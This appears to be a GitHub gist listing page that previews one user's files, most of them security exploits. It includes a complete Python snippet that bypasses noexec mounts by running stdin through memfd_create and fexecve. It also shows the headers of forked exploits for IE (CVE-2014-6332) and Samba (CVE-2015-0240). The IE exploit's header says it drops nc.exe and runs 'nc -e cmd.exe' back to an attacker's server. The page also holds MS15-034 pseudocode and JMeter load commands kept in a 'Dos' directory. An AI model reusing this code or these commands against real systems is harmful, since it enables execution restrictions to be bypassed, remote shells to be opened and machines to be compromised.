Barkın Kılıç barkink
barkink
/ download-nessus-all.py
Created
November 3, 2016 08:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| import os | |
| import io | |
| import argparse | |
| import getpass | |
| import json | |
| sys.path.append('../') |
barkink
/ displayout-licence
Last active
February 28, 2017 10:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| test |
barkink
/ bypass noexec
Created
March 7, 2017 09:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ctypes import * | |
| c = CDLL("libc.so.6") | |
| fd = c.syscall(319,"tempmem",0) | |
| c.sendfile(fd,0,0,0x7ffff000) | |
| c.fexecve(fd,byref(c_char_p()),byref(c_char_p())) | |
| print "fexecve failed" |
barkink
/ cve-2014-6332_win7_ie11_poc.html
Created
May 14, 2017 18:36
— forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode | |
| - Tested on IE11 + Windows 7 64-bit | |
| References: | |
| - original PoC - http://www.exploit-db.com/exploits/35229/ | |
| - http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ | |
| - http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html |
barkink
/ cve-2014-6332_exploit.html
Created
May 14, 2017 18:37
— forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
barkink
/ cve-2015-0240_samba_poc
Created
May 14, 2017 18:37
— forked from worawit/cve-2015-0240_samba_poc
PoC for Samba vulnerabilty (CVE-2015-0240)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| PoC for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| This PoC does only triggering the bug | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ | |
| ################# | |
| Exploitability against CentOS/Ubuntu binaries |
barkink
/ cve-2015-0240_samba_exploit.py
Created
May 14, 2017 18:38
— forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
barkink
/ http_sys_pseudo.c
Created
May 14, 2017 18:39
— forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Pseudo code in HTTP.sys to understand flow related to MS15-034 | |
| All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86 | |
| For anyone want to know what function are patched. | |
| Just open patched version and find all functions reference to RtlULongLongAdd(). | |
| */ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| intervalo=1 | |
| info="/sys/class/net/" | |
| cd $info | |
| for interface in eth* | |
| do | |
| rx1=`cat $info$interface/statistics/rx_bytes` | |
| tx1=`cat $info$interface/statistics/tx_bytes` | |
| `sleep $((intervalo))s` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /root/Dos/apache-jmeter-3.1/bin/jmeter -n -t /tmp/0.jmx -l /tmp/0.jtl -Jjmeter.save.saveservice.output_format=xml -Jjmeter.save.saveservice.assertion_results=all -Jjmeter.save.saveservice.bytes=true -Jfile_format.testlog=2.1 -Jjmeter.save.saveservice.response_data.on_error=true -Jjmeter.save.saveservice.thread_counts=true -Jjmeter.save.saveservice.response_data=true -Jjmeter.save.saveservice.samplerData=true -Jjmeter.save.saveservice.requestHeaders=true -Jjmeter.save.saveservice.url=true -Jjmeter.save.saveservice.responseHeaders=true | |
| for i in $(cat /usr/local/etc/machines.list );do dsh -m $i "/root/Dos/apache-jmeter-3.1/bin/jmeter -n -t /tmp/test.jmx -l /tmp/test2.jtl -Jjmeter.save.saveservice.output_format=xml -Jjmeter.save.saveservice.assertion_results=all -Jjmeter.save.saveservice.bytes=true -Jfile_format.testlog=2.1 -Jjmeter.save.saveservice.response_data.on_error=true -Jjmeter.save.saveservice.thread_counts=true -Jjmeter.save.saveservice.response_data=true -Jjmeter.save.saveservice.samplerData=true -Jj |
OlderNewer